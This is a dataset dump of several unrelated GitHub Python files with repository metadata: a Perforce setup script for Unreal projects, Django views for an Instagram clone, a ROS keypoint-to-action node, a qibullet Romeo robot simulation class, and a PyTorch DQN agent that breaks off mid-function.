\" text //depot/....cs\",\n \" text //depot/....m\",\n \" text //depot/....mm\",\n \" text //depot/....py\",\n \" binary+l //depot/....uasset\",\n \" binary+l //depot/....umap\",\n \" binary+l //depot/....upk\",\n \" binary+l //depot/....udk\",\n]\n\n\ndef export_p4_config(ws_root, port, ws, user):\n config_filename = \".p4config\"\n ignore_filename = \".p4ignore\"\n config_filepath = os.path.join(ws_root, config_filename)\n lines = [\n \"P4PORT={}\\n\".format(port),\n \"P4CLIENT={}\\n\".format(ws),\n \"P4USER={}\\n\".format(user),\n \"P4HOST={}\\n\".format(socket.gethostname()),\n \"P4IGNORE={}\\n\".format(ignore_filename),\n ]\n\n if os.path.exists(config_filepath):\n print(\".p4config already exists\")\n return\n\n with open(config_filepath, \"w\") as config_buffer:\n config_buffer.writelines(lines)\n print(\"p4config written to\", config_filepath)\n\n\ndef export_p4_ignore(ws_root, ue_project_name):\n ignore_filename = \".p4ignore\"\n ignore_filepath = os.path.join(ws_root, ignore_filename)\n lines = [\n _.replace(\"GAMEPROJECT\", ue_project_name) + \"\\n\" for _ in default_ue_p4ignore\n ]\n\n if os.path.exists(ignore_filepath):\n print(\".p4ignore already exists\")\n return\n\n with open(ignore_filepath, \"w\") as ignore_buffer:\n ignore_buffer.writelines(lines)\n\n print(\"p4ignore written to\", ignore_filepath)\n\n\ndef get_stream_name(ws_root):\n p = subprocess.Popen(\n [\"p4\", \"-F\", '\"%Stream%\"', \"-ztag\", \"client\", \"-o\"],\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=ws_root,\n )\n\n stream_stdout = p.communicate()[0]\n stream = stream_stdout.decode().replace(\"\\r\\n\", \"\").replace('\"', \"\")\n\n return stream\n\n\ndef setup_p4_typemap(ws_root):\n stream_name = get_stream_name(ws_root)\n depot_name = [_ for _ in stream_name.split(\"/\") if _][0]\n typemap_string = \"\\n\".join(\n [_.replace(\"depot\", depot_name) for _ in default_ue_typemap]\n )\n p = subprocess.Popen(\n [\"p4\", \"typemap\", \"-i\"],\n stdout=subprocess.PIPE,\n stdin=subprocess.PIPE,\n stderr=subprocess.STDOUT,\n cwd=ws_root,\n )\n typemap_stdout = p.communicate(input=typemap_string.encode(\"utf-8\"))[0]\n print(typemap_stdout.decode())\n\n\ndef setup_for_unreal(ws_root, port, ws, user, ue_project_name):\n export_p4_config(ws_root, port, ws, user)\n export_p4_ignore(ws_root, ue_project_name)\n setup_p4_typemap(ws_root)\n\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"ws_root\")\n parser.add_argument(\"port\")\n parser.add_argument(\"ws\")\n parser.add_argument(\"user\")\n parser.add_argument(\"ue_project_name\")\n\n parsed_args = parser.parse_args()\n\n setup_for_unreal(\n parsed_args.ws_root,\n parsed_args.port,\n parsed_args.ws,\n parsed_args.user,\n parsed_args.ue_project_name,\n )\n", "repo_name": "rmaffesoli/p4v_custom_tools", "sub_path": "setup_for_unreal.py", "file_name": "setup_for_unreal.py", "file_ext": "py", "file_size_in_byte": 6680, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 4, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path", "line_number": 135, "usage_type": "attribute"}, {"api_name": "socket.gethostname", "line_number": 140, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 144, "usage_type": "call"}, {"api_name": "os.path", "line_number": 144, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 155, "usage_type": "call"}, {"api_name": "os.path", "line_number": 155, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 160, "usage_type": "call"}, {"api_name": "os.path", "line_number": 160, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 171, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 173, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 174, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 175, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 191, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 193, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 194, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 195, "usage_type": "attribute"}, {"api_name": "argparse.ArgumentParser", "line_number": 209, "usage_type": "call"}]} +{"seq_id": "12432097221", "text": "from django.shortcuts import render,redirect\nfrom .models import Image,User,Profile\nfrom django.contrib.auth.decorators import login_required\nfrom .forms import PostForm\nfrom django.http import HttpResponse,Http404,HttpResponseRedirect\n\n\n\n# Create your views here.\n@login_required(login_url='/accounts/login/') \ndef home(request):\n posts=Image.show_images()\n return render(request,'ig/home.html',{'posts':posts})\n@login_required\ndef search_profile(request):\n if 'profile' in request.GET and request.GET[\"profile\"]:\n search_term=request.GET.get(\"profile\")\n results_profiles=Image.search_profile('search_term')\n message=f\"{search_term}\"\n return render(request,'ig/search.html',{'message':message,'profiles':results_profiles})\n\n else:\n message='you havent searched for any thing'\n return render(request,'ig/search.html',{'message':message})\n@login_required\ndef new_post(request):\n current_user = request.user\n\n if request.method == \"POST\":\n form = PostForm(request.POST,request.FILES)\n\n if form.is_valid():\n post = form.save(commit=False)\n post.user = current_user\n post.save()\n return redirect(\"home\")\n\n else:\n form = PostForm()\n\n return render(request, \"ig/new_post.html\", context={\"form\":form})\n@login_required\ndef profile(request, id):\n user = User.objects.get(id=id)\n profile = Profile.objects.get(id=id)\n posts = Post.objects.filter(profile__id=id)[::-1]\n return render(request, \"ig/profile.html\", context={\"user\":user,\"profile\":profile,\"posts\":posts})", "repo_name": "trevor-ngugi/instagram-clone", "sub_path": "gram/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 1600, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "models.Image.show_images", "line_number": 12, "usage_type": "call"}, {"api_name": "models.Image", "line_number": 12, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 13, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 10, "usage_type": "call"}, {"api_name": "models.Image.search_profile", "line_number": 18, "usage_type": "call"}, {"api_name": "models.Image", "line_number": 18, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 20, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 24, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 14, "usage_type": "name"}, {"api_name": "forms.PostForm", "line_number": 30, "usage_type": "call"}, {"api_name": "django.shortcuts.redirect", "line_number": 36, "usage_type": "call"}, {"api_name": "forms.PostForm", "line_number": 39, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 41, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 25, "usage_type": "name"}, {"api_name": "models.User.objects.get", "line_number": 44, "usage_type": "call"}, {"api_name": "models.User.objects", "line_number": 44, "usage_type": "attribute"}, {"api_name": "models.User", "line_number": 44, "usage_type": "name"}, {"api_name": "models.Profile.objects.get", "line_number": 45, "usage_type": "call"}, {"api_name": "models.Profile.objects", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.Profile", "line_number": 45, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 47, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "39844722363", "text": "#!/usr/bin/env python\nimport sys\nimport rospy\nfrom keypoint_3d_matching_msgs.msg import Keypoint3d_list\nfrom collaborative_games.msg import action_msg\nimport yaml\n\n\ndef get_config(config_file='config_keypoints.yaml'):\n try:\n with open(config_file) as file:\n yaml_data = yaml.safe_load(file)\n except Exception as e:\n print('Error reading the config file')\n\n return yaml_data\n\n\nclass HumanAction:\n\n def __init__(self, config=\"config_keypoints.yaml\"):\n self.config = get_config(\"../../maze3D_game/\" + config)\n topic_to_listen_to = self.config['topic_to_listen_to']\n self.keypoint_sub = rospy.Subscriber(topic_to_listen_to, Keypoint3d_list, self.callback)\n topic_to_publish_on = self.config['topic_to_publish_on']\n self.action_human_pub = rospy.Publisher(topic_to_publish_on, action_msg, queue_size=1)\n self.prev_x = None\n self.start_time = None\n\n def callback(self, pos_x):\n\n # get the header from the received message\n h = pos_x.keypoints[0].points.header\n # get the keypoint of wrist\n pos_x = pos_x.keypoints[0].points.point.x\n\n # set the starting point of the wrist\n starting_point = self.config['start_keypoint']\n offset = self.config['offset']\n \"\"\"\n s: starting point\n o/2: offset/2\n ================================================\n -1 | 0 | 1 \n ================================================\n LEFT | CENTER | RIGHT \n ------------------------------------------------\n ||<---offset--->| | ||\n || | s | ||\n || <-o/2->|<-o/2-><-o/2->|<-o/2-> ||\n ------------------------------------------------\n \"\"\"\n if pos_x < starting_point - (offset / 2):\n action = -1\n elif pos_x > starting_point + (offset / 2):\n action = 1\n else:\n action = 0\n\n act = action_msg()\n act.action = action\n act.header = h\n self.action_human_pub.publish(act)\n return action\n\n\nif __name__ == '__main__':\n rospy.init_node('keypoint_to_action', anonymous=True)\n action_listener = HumanAction() # take first argument\n try:\n rospy.spin()\n except KeyboardInterrupt:\n print(\"Shutting down\")\n", "repo_name": "ligerfotis/collaborative_games", "sub_path": "src/human_action/3d_keypoints/keypoint_to_discrete_action.py", "file_name": "keypoint_to_discrete_action.py", "file_ext": "py", "file_size_in_byte": 2434, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "yaml.safe_load", "line_number": 12, "usage_type": "call"}, {"api_name": "rospy.Subscriber", "line_number": 24, "usage_type": "call"}, {"api_name": "keypoint_3d_matching_msgs.msg.Keypoint3d_list", "line_number": 24, "usage_type": "argument"}, {"api_name": "rospy.Publisher", "line_number": 26, "usage_type": "call"}, {"api_name": "collaborative_games.msg.action_msg", "line_number": 26, "usage_type": "argument"}, {"api_name": "collaborative_games.msg.action_msg", "line_number": 60, "usage_type": "call"}, {"api_name": "rospy.init_node", "line_number": 68, "usage_type": "call"}, {"api_name": "rospy.spin", "line_number": 71, "usage_type": "call"}]} +{"seq_id": "36565429620", "text": "#!/usr/bin/env python\n# coding: utf-8\n\nimport os\nimport pybullet\nimport qibullet.tools as tools\nfrom qibullet.imu import Imu\nfrom qibullet.camera import CameraRgb\nfrom qibullet.camera import CameraDepth\nfrom qibullet.robot_posture import RomeoPosture\nfrom qibullet.robot_virtual import RobotVirtual\n\n\nclass RomeoVirtual(RobotVirtual):\n \"\"\"\n Class representing the virtual instance of the Romeo robot\n \"\"\"\n ID_CAMERA_RIGHT = 0\n ID_CAMERA_LEFT = 1\n ID_CAMERA_DEPTH = 2\n FRAME_WORLD = 1\n FRAME_ROBOT = 2\n URDF_FILE = \"/romeo.urdf\"\n P_STAND = RomeoPosture(\"Stand\")\n P_STAND_INIT = RomeoPosture(\"StandInit\")\n P_STAND_ZERO = RomeoPosture(\"StandZero\")\n P_CROUCH = RomeoPosture(\"Crouch\")\n\n def __init__(self):\n \"\"\"\n Constructor\n \"\"\"\n # Install the robot meshes and URDFs if they are not already installed.\n # The installation process won't be covered by the unit tests\n if not tools._check_resources_installed(): # pragma: no cover\n tools._install_resources()\n\n # Specify the URDF path\n RobotVirtual.__init__(\n self,\n tools._get_resources_folder() + RomeoVirtual.URDF_FILE)\n\n self.camera_right = None\n self.camera_left = None\n self.camera_depth = None\n\n def loadRobot(self, translation, quaternion, physicsClientId=0):\n \"\"\"\n Overloads @loadRobot from the @RobotVirtual class, loads the robot into\n the simulated instance. This method also updates the max velocity of\n the robot's fingers, adds self collision filters to the model and\n defines the cameras of the model in the camera_dict.\n\n Parameters:\n translation - List containing 3 elements, the translation [x, y, z]\n of the robot in the WORLD frame\n quaternion - List containing 4 elements, the quaternion\n [x, y, z, q] of the robot in the WORLD frame\n physicsClientId - The id of the simulated instance in which the\n robot is supposed to be loaded\n \"\"\"\n pybullet.setAdditionalSearchPath(\n os.path.dirname(os.path.realpath(__file__)),\n physicsClientId=physicsClientId)\n\n # Add 0.50 meters on the z component, avoing to spawn NAO in the ground\n translation = [translation[0], translation[1], translation[2] + 1.05]\n\n RobotVirtual.loadRobot(\n self,\n translation,\n quaternion,\n physicsClientId=physicsClientId)\n\n balance_constraint = pybullet.createConstraint(\n parentBodyUniqueId=self.robot_model,\n parentLinkIndex=-1,\n childBodyUniqueId=-1,\n childLinkIndex=-1,\n jointType=pybullet.JOINT_FIXED,\n jointAxis=[0, 0, 0],\n parentFramePosition=[0, 0, 0],\n parentFrameOrientation=[0, 0, 0, 1],\n childFramePosition=translation,\n childFrameOrientation=quaternion,\n physicsClientId=self.physics_client)\n\n self.goToPosture(\"Stand\", 1.0)\n\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[\"REye\"].getIndex(),\n self.link_dict[\"LEye\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n\n for link in [\"torso\", \"HeadRoll_link\"]:\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[\"NeckPitch_link\"].getIndex(),\n self.link_dict[link].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n\n for side in [\"R\", \"L\"]:\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side + \"Eye\"].getIndex(),\n self.link_dict[\"HeadRoll_link\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side + \"Thigh\"].getIndex(),\n self.link_dict[\"body\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side.lower() + \"_ankle\"].getIndex(),\n self.link_dict[side + \"Tibia\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side + \"ShoulderYaw_link\"].getIndex(),\n self.link_dict[\"torso\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side + \"WristRoll_link\"].getIndex(),\n self.link_dict[side.lower() + \"_wrist\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n\n for link in [\"ShoulderYaw_link\", \"WristYaw_link\"]:\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side + link].getIndex(),\n self.link_dict[side + \"Elbow\"].getIndex(),\n 0,\n physicsClientId=self.physics_client)\n\n for name, link in self.link_dict.items():\n if side + \"Finger\" in name or\\\n side + \"Thumb\" in name:\n pybullet.setCollisionFilterPair(\n self.robot_model,\n self.robot_model,\n self.link_dict[side.lower() + \"_wrist\"].getIndex(),\n link.getIndex(),\n 0,\n physicsClientId=self.physics_client)\n\n for joint in self.joint_dict.values():\n pybullet.resetJointState(\n self.robot_model,\n joint.getIndex(),\n 0.0,\n physicsClientId=self.physics_client)\n\n pybullet.removeConstraint(\n balance_constraint,\n physicsClientId=self.physics_client)\n\n for joint_name in list(self.joint_dict):\n if 'RFinger' in joint_name or 'RThumb' in joint_name:\n self.joint_dict[joint_name].setMaxVelocity(\n self.joint_dict[\"RHand\"].getMaxVelocity())\n elif 'LFinger' in joint_name or 'LThumb' in joint_name:\n self.joint_dict[joint_name].setMaxVelocity(\n self.joint_dict[\"LHand\"].getMaxVelocity())\n\n camera_right = CameraRgb(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_RIGHT,\n self.link_dict[\"CameraRightEye_optical_frame\"],\n hfov=60.9,\n vfov=47.6,\n physicsClientId=self.physics_client)\n\n camera_left = CameraRgb(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_LEFT,\n self.link_dict[\"CameraLeftEye_optical_frame\"],\n hfov=60.9,\n vfov=47.6,\n physicsClientId=self.physics_client)\n\n camera_depth = CameraDepth(\n self.robot_model,\n RomeoVirtual.ID_CAMERA_DEPTH,\n self.link_dict[\"CameraDepth_optical_frame\"],\n hfov=58.0,\n vfov=45.0,\n physicsClientId=self.physics_client)\n\n self.camera_dict = {\n RomeoVirtual.ID_CAMERA_RIGHT: camera_right,\n RomeoVirtual.ID_CAMERA_LEFT: camera_left,\n RomeoVirtual.ID_CAMERA_DEPTH: camera_depth}\n\n # The frequency of the IMU is set to 100Hz\n self.imu = Imu(\n self.robot_model,\n self.link_dict[\"torso\"],\n 100.0,\n physicsClientId=self.physics_client)\n\n def setAngles(self, joint_names, joint_values, percentage_speed):\n \"\"\"\n Overloads @setAngles from the @RobotVirtual class. Handles the finger\n mimic behaviour.\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints to be controlled\n joint_values - List of values (or value if only one joint)\n corresponding to the angles in radians to be applied\n percentage_speed - Percentages of the max speed to be used for\n each joint, has to be strictly superior to 0 and inferior or equal\n to 1\n \"\"\"\n try:\n if type(joint_names) is str:\n assert type(joint_values) is int or type(joint_values) is float\n names = [joint_names]\n values = [joint_values]\n else:\n assert type(joint_names) is type(joint_values) is list\n names = list(joint_names)\n values = list(joint_values)\n\n if isinstance(percentage_speed, list):\n speeds = list(percentage_speed)\n else:\n speeds = [percentage_speed]*len(names)\n\n except AssertionError:\n raise pybullet.error(\"Error in the parameters given to the\\\n setAngles method\")\n\n for hand in [\"RHand\", \"LHand\"]:\n for i in range(names.count(hand)):\n index = names.index(hand)\n value = values[index]\n speed = speeds[index]\n names.pop(index)\n values.pop(index)\n speeds.pop(index)\n finger_names, finger_values = self._mimicHand(hand, value)\n names.extend(finger_names)\n values.extend(finger_values)\n speeds.extend([speed]*len(finger_names))\n\n RobotVirtual.setAngles(\n self,\n names,\n values,\n speeds)\n\n def getAnglesPosition(self, joint_names):\n \"\"\"\n Overloads @getAnglesPosition from the @RobotVirtual class. Handles the\n finger mimicked position for the hands (when getting the position of\n RHand or LHand, will return the hand's opening percentage).\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints\n\n Returns:\n joint_positions - List of float (or float if only one joint)\n containing the joint's positions in radians\n \"\"\"\n if type(joint_names) is str:\n names = [joint_names]\n else:\n names = list(joint_names)\n\n joint_positions = RobotVirtual.getAnglesPosition(self, names)\n\n for hand, finger in zip(\n [\"RHand\", \"LHand\"],\n [\"RFinger11\", \"LFinger11\"]):\n for i in range(names.count(hand)):\n index = names.index(hand)\n joint_positions[index] =\\\n RobotVirtual.getAnglesPosition(self, [finger]).pop() /\\\n (1/(self.joint_dict[finger].getUpperLimit() -\n self.joint_dict[finger].getLowerLimit())) +\\\n self.joint_dict[finger].getLowerLimit()\n\n if len(joint_positions) == 1:\n return joint_positions.pop()\n else:\n return joint_positions\n\n def getAnglesVelocity(self, joint_names):\n \"\"\"\n Overloads @getAnglesVelocity from the @RobotVirtual class. The method\n won't return the velocity of RHand and LHand joints.\n\n Parameters:\n joint_names - List of string (or string if only one joint)\n containing the name of the joints\n\n Returns:\n joint_velocities - List of float (or float if only one joint)\n containing the joint's velocities in rad/s\n \"\"\"\n if type(joint_names) is str:\n names = [joint_names]\n else:\n names = list(joint_names)\n\n joint_velocities = RobotVirtual.getAnglesVelocity(self, names)\n\n if len(joint_velocities) == 1:\n return joint_velocities.pop()\n else:\n return joint_velocities\n\n def goToPosture(self, posture_name, percentage_speed):\n \"\"\"\n Position the virtual robot into a particular posture. The different\n available postures are NaoPosture objects.\n\n Parameters:\n posture_name - String containing the name of the posture. The\n posture name is not case-sensitive\n percentage_speed - Percentage of the max speed to be used for the\n movement\n\n Returns:\n Boolean - True if the posture can be applied, False otherwise\n \"\"\"\n posture_list = [\n RomeoVirtual.P_STAND,\n RomeoVirtual.P_STAND_INIT,\n RomeoVirtual.P_STAND_ZERO,\n RomeoVirtual.P_CROUCH]\n\n for posture in posture_list:\n if posture.isPostureName(posture_name):\n self.setAngles(\n posture.getPostureJointNames(),\n posture.getPostureJointValues(),\n percentage_speed)\n\n return True\n\n return False\n\n def _mimicHand(\n self,\n hand,\n value,\n multiplier=0.988205,\n thumb_multiplier=1.74533,\n offset=0.0):\n \"\"\"\n Used to propagate a joint value on the fingers attached to the hand.\n The formula used to mimic a joint is the following:\n\n finger_value = (hand_value * multiplier) + offset\n\n Parameters:\n hand - String, RHand or LHand\n value - The joint value to be propagated\n multiplier - The multiplier coefficient for the fingers and the\n sections 2 and 3 of the thumbs (0.988205 by default)\n thumb_multiplier - The multiplier coefficient for the first section\n of the thumb (1.74533 by default)\n offset - The offset coefficient (0.0 by default)\n\n Returns:\n finger_names - Names of the finger to be controlled\n finger_values - Values of the fingers to be controlled\n \"\"\"\n finger_names = list()\n finger_values = list()\n\n for joint_name in self.joint_dict.keys():\n if hand[0] + \"Thumb1\" in joint_name:\n finger_names.append(joint_name)\n finger_values.append((value * thumb_multiplier) + offset)\n elif (hand[0] + \"Finger\") in joint_name or\\\n (hand[0] + \"Thumb\") in joint_name:\n finger_names.append(joint_name)\n finger_values.append((value * multiplier) + offset)\n\n return finger_names, finger_values\n", "repo_name": "softbankrobotics-research/qibullet", "sub_path": "qibullet/romeo_virtual.py", "file_name": "romeo_virtual.py", "file_ext": "py", "file_size_in_byte": 14895, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 130, "dataset": "github-code", "pt": "52", "api": [{"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 14, "usage_type": "name"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 24, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 25, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 26, "usage_type": "call"}, {"api_name": "qibullet.robot_posture.RomeoPosture", "line_number": 27, "usage_type": "call"}, {"api_name": "qibullet.tools._check_resources_installed", "line_number": 35, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 35, "usage_type": "name"}, {"api_name": "qibullet.tools._install_resources", "line_number": 36, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 36, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.__init__", "line_number": 39, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 39, "usage_type": "name"}, {"api_name": "qibullet.tools._get_resources_folder", "line_number": 41, "usage_type": "call"}, {"api_name": "qibullet.tools", "line_number": 41, "usage_type": "name"}, {"api_name": "pybullet.setAdditionalSearchPath", "line_number": 62, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 63, "usage_type": "call"}, {"api_name": "os.path", "line_number": 63, "usage_type": "attribute"}, {"api_name": "os.path.realpath", "line_number": 63, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.loadRobot", "line_number": 69, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 69, "usage_type": "name"}, {"api_name": "pybullet.createConstraint", "line_number": 75, "usage_type": "call"}, {"api_name": "pybullet.JOINT_FIXED", "line_number": 80, "usage_type": "attribute"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 90, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 99, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 108, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 115, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 122, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 129, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 136, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 145, "usage_type": "call"}, {"api_name": "pybullet.setCollisionFilterPair", "line_number": 156, "usage_type": "call"}, {"api_name": "pybullet.resetJointState", "line_number": 165, "usage_type": "call"}, {"api_name": "pybullet.removeConstraint", "line_number": 171, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraRgb", "line_number": 183, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraRgb", "line_number": 191, "usage_type": "call"}, {"api_name": "qibullet.camera.CameraDepth", "line_number": 199, "usage_type": "call"}, {"api_name": "qibullet.imu.Imu", "line_number": 213, "usage_type": "call"}, {"api_name": "pybullet.error", "line_number": 249, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.setAngles", "line_number": 265, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 265, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesPosition", "line_number": 290, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 290, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesPosition", "line_number": 298, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 298, "usage_type": "name"}, {"api_name": "qibullet.robot_virtual.RobotVirtual.getAnglesVelocity", "line_number": 326, "usage_type": "call"}, {"api_name": "qibullet.robot_virtual.RobotVirtual", "line_number": 326, "usage_type": "name"}]} +{"seq_id": "24883816787", "text": "import numpy as np\nimport torch\nimport torch.nn as nn\nimport torch.autograd as autograd\nfrom collections import deque\nimport random\nfrom utils import FrameStack, WarpFrame, Uint2Float\nimport time\n\nuse_cuda = torch.cuda.is_available()\ndevice = torch.device(\"cuda\" if use_cuda else \"cpu\")\n\n\nclass DQNNet(nn.Module):\n def __init__(self, n_actions):\n super(DQNNet, self).__init__()\n\n self.conv = nn.Sequential(nn.Conv2d(4, 32, kernel_size=8, stride=4), nn.ReLU(),\n nn.Conv2d(32, 64, kernel_size=4, stride=2), nn.ReLU(),\n nn.Conv2d(64, 64, kernel_size=3, stride=1), nn.ReLU())\n self.fc = nn.Sequential(nn.Linear(7 * 7 * 64, 512), nn.ReLU(), nn.Linear(512, n_actions))\n\n def forward(self, obs):\n #obs = TorchFrame(obs).to(device)\n obs = Uint2Float(obs)\n obs = obs.view(-1, 4, 84, 84)\n obs = self.conv(obs)\n obs = obs.view(obs.shape[0], obs.shape[1] * obs.shape[2] * obs.shape[3])\n actions = self.fc(obs)\n return actions\n\n\nclass ReplayBuffer(object):\n def __init__(self, capacity):\n self.buffer = deque(maxlen=capacity)\n\n def push(self, state, action, reward, next_state, done):\n self.buffer.append([state, action, reward, next_state, done])\n\n def sample(self, batch_size):\n #state, action, reward, next_state, done = map(list, zip(*random.sample(self.buffer, batch_size)))\n state, action, reward, next_state, done = zip(*random.sample(self.buffer, batch_size))\n return state, action, reward, next_state, done\n\n def __len__(self):\n return len(self.buffer)\n\nclass DQNAgent():\n def __init__(self,\n env,\n lr=0.00025,\n alpha=0.95,\n gamma=0.99,\n rep_buf_size=125000,\n rep_buf_ini=12500,\n batch_size=32,\n target_update=5000,\n skip_frame = 4):\n self.env = env\n self.n_actions = env.action_space.n\n self.gamma = gamma\n self.rep_buf_size = rep_buf_size\n self.rep_buf_ini = rep_buf_ini\n self.batch_size = batch_size\n self.target_update = target_update\n self.device = device\n self.policy_model = DQNNet(self.n_actions).to(device)\n self.target_model = DQNNet(self.n_actions).to(device)\n self.target_model.load_state_dict(self.policy_model.state_dict())\n self.optimizer = torch.optim.RMSprop(self.policy_model.parameters(), lr=lr, alpha=alpha)\n self.replay_buffer = ReplayBuffer(rep_buf_size)\n self.skip_frame = skip_frame\n self.init_replay()\n\n def init_replay(self):\n while len(self.replay_buffer) < self.rep_buf_ini:\n observation = self.env.reset()\n observation = WarpFrame(observation)\n observation = np.stack([observation] * 4, axis=0)\n done = False\n\n while not done:\n action = self.env.action_space.sample()\n\n next_observation, reward, done, info = self.env.step(action)\n next_observation = FrameStack(next_observation, observation)\n\n self.replay_buffer.push(observation, action, reward, next_observation, done)\n\n observation = next_observation\n\n print('Experience Replay buffer initialized')\n\n def choose_action(self, obs, epsilon):\n if random.random() > epsilon:\n obs = torch.from_numpy(np.array(obs)).float().to(device)\n q_value = self.policy_model(obs)\n action = q_value.argmax(1).data.cpu().numpy().astype(int)[0]\n else:\n action = self.env.action_space.sample()\n return action\n\n def huber_loss(self, input, target, beta=1, size_average=True):\n \"\"\"\n very similar to the smooth_l1_loss from pytorch, but with\n the extra beta parameter\n \"\"\"\n n = torch.abs(input - target)\n cond = n < beta\n loss = torch.where(cond, 0.5 * n ** 2 / beta, n - 0.5 * beta)\n if size_average:\n return loss.mean()\n return loss.sum()\n\n def learn(self, num_frames):\n \"\"\"\n Update the policy\n \"\"\"\n loss = 0\n if len(self.replay_buffer) > self.batch_size and num_frames % self.skip_frame == 0:\n observations, actions, rewards, next_observations, dones = self.replay_buffer.sample(self.batch_size)\n observations = torch.from_numpy(np.array(observations)).float().to(device)\n\n actions = torch.from_numpy(np.array(actions).astype(int)).float().to(device)\n actions = actions.view(actions.shape[0], 1)\n\n rewards = torch.from_numpy(np.array(rewards)).float().to(device)\n rewards = rewards.view(rewards.shape[0], 1)\n\n dones = torch.from_numpy(np.array(dones).astype(int)).float().to(device)\n dones = dones.view(dones.shape[0], 1)\n\n next_observations = torch.from_numpy(np.array(next_observations)).float().to(device)\n\n q_values = self.policy_model(observations)\n next_q_values = self.target_model(next_observations)\n\n q_value = q_values.gather(1, actions.long())\n next_q_value = next_q_values.max(1)[0].unsqueeze(1)\n expected_q_value = rewards + self.gamma * next_q_value * (1 - dones)\n\n loss = self.huber_loss(q_value, expected_q_value)\n\n self.optimizer.zero_grad()\n loss.backward()\n\n self.optimizer.step()\n\n loss = loss.item()\n\n if num_frames % self.target_update == 0:\n 